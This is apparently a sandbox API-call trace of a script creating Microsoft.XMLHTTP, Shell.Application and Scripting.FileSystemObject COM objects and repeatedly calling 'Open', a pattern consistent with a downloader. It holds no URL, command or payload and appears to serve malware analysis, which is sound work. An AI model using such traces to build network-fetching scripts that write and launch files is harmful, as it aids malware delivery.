	[0703.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0703.774] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0703.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0703.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0703.774] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0703.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0703.775] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0703.775] SysStringLen (param_1=0x0) returned 0x0
	[0703.775] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0703.775] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0703.775] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0703.775] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0703.775] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0703.775] ??2@YAPEAX_K@Z () returned 0x62f350
	[0703.775] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0703.775] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0703.775] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0703.775] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0703.776] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0703.776] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0703.776] SysStringLen (param_1=0x0) returned 0x0
	[0703.776] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0703.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0703.783] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0703.783] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0703.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0703.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0703.783] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0705.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0705.603] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0705.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0705.604] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.604] SysStringLen (param_1=0x0) returned 0x0
	[0705.604] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0705.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.604] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0705.605] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0705.605] ??2@YAPEAX_K@Z () returned 0x62f330
	[0705.605] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0705.605] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.605] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0705.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0705.605] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0705.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.605] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.608] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.608] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.608] SysStringLen (param_1=0x0) returned 0x0
	[0705.608] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0705.608] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.608] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0705.608] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.608] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0705.608] ??2@YAPEAX_K@Z () returned 0x62f310
	[0705.608] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0705.609] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.609] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0705.609] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0705.609] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0705.609] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.609] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.609] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.609] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.609] SysStringLen (param_1=0x0) returned 0x0
	[0705.609] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.610] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0705.610] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0705.610] ??2@YAPEAX_K@Z () returned 0x62f330
	[0705.610] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.610] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0705.610] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.610] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.611] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.611] SysStringLen (param_1=0x0) returned 0x0
	[0705.611] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0705.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.611] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0705.611] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0705.611] ??2@YAPEAX_K@Z () returned 0x62f310
	[0705.611] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0705.611] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.611] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0705.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0705.611] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0705.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.612] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.612] longjmp () 
	[0705.612] longjmp () 
	[0705.612] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.612] SysStringLen (param_1=0x0) returned 0x0
	[0705.612] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
